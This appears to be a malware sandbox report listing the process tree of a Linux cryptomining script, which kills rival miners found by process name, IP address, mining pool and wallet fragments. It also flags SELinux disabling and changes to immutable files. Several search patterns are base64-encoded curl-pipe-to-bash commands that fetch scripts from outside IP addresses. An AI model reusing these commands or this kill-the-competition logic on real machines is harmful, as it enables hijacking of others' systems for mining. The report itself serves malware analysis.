/bin/grepgrep /tmp/java2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep gitee.com2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 104.248.4.1622⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep 89.35.39.782⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kthrotlds2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep ksoftirqds2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netdns2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchdogs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kdevtmpfsi2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep kinsing2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep redis22⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep " ps"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep sync_supers2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/bin/grepgrep cpuset2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep "x]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep "sh] <"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep " \\[]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep /tmp/l.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/zmcat2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep CnzFVPLF2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep CvKzzZLs2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/udevd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵
-
-
/bin/grepgrep sustse2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse32⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep j2.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 107.174.47.1562⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 83.220.169.2472⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.38.203.1462⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 144.217.45.452⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 107.174.47.1812⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep mine.moneropool.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep pool.t00ls.ru2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵
- Disables SELinux
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grep
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep monerohash.com2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep /tmp/a7b104c2702⤵
- Disables SELinux
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:66662⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/bin/grepgrep xmr.crypto-pool.fr:77772⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:4432⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/bin/grepgrep stratum.f2pool.com:88882⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep xmrpool.eu2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep kieuanilam.me2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 16463⤵
-
-
/usr/local/bin/killkill -9 16463⤵
-
-
/usr/sbin/killkill -9 16463⤵
-
-
/usr/bin/killkill -9 16463⤵
-
-
/sbin/killkill -9 16463⤵
-
-
/bin/killkill -9 16463⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xiaoyao2⤵
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep xiaoxue2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 16513⤵
-
-
/usr/local/bin/killkill -9 16513⤵
-
-
/usr/sbin/killkill -9 16513⤵
-
-
/usr/bin/killkill -9 16513⤵
-
-
/sbin/killkill -9 16513⤵
-
-
/bin/killkill -9 16513⤵
-
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep 46.243.253.152⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f L2Jpbi9iYXN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f xzpauectgr2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f slxfbkmxtd2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f mixtape2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f addnj2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 200.68.17.1962⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f IyEvYmluL3NoCgpzUG2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f KHdnZXQgLXFPLSBodHRw2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS32⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mwyumwdbpq.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f honvbsasbf.conf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mqdsflm.cf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f lower.sh2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./ppp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f cryptonight2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./seervceaess2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceaess2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./servceas2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./servcesa2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./vsp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./jvs2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./pvv2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./vpp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./pces2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./rspce2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./haveged2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./jiba2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./watchbog2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./A7mA5gb2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kacpi_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kswap_svc2⤵
-
-
/usr/bin/pgreppgrep -f kauditd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kpsmoused_svc2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kseriod_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kthreadd_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ksoftirqd_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kintegrityd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f jawa2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f oracle.jpg2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 188.209.49.542⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f 181.214.87.2412⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f servim2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kblockd_svc2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f native_svc2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ynn2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 65ccEJ72⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f jmxx2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f 2Ne80nA2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f sysstats2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f systemxlv2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f watchbog2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f OIcJi1m2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f biosetjenkins2⤵
- Reads CPU attributes
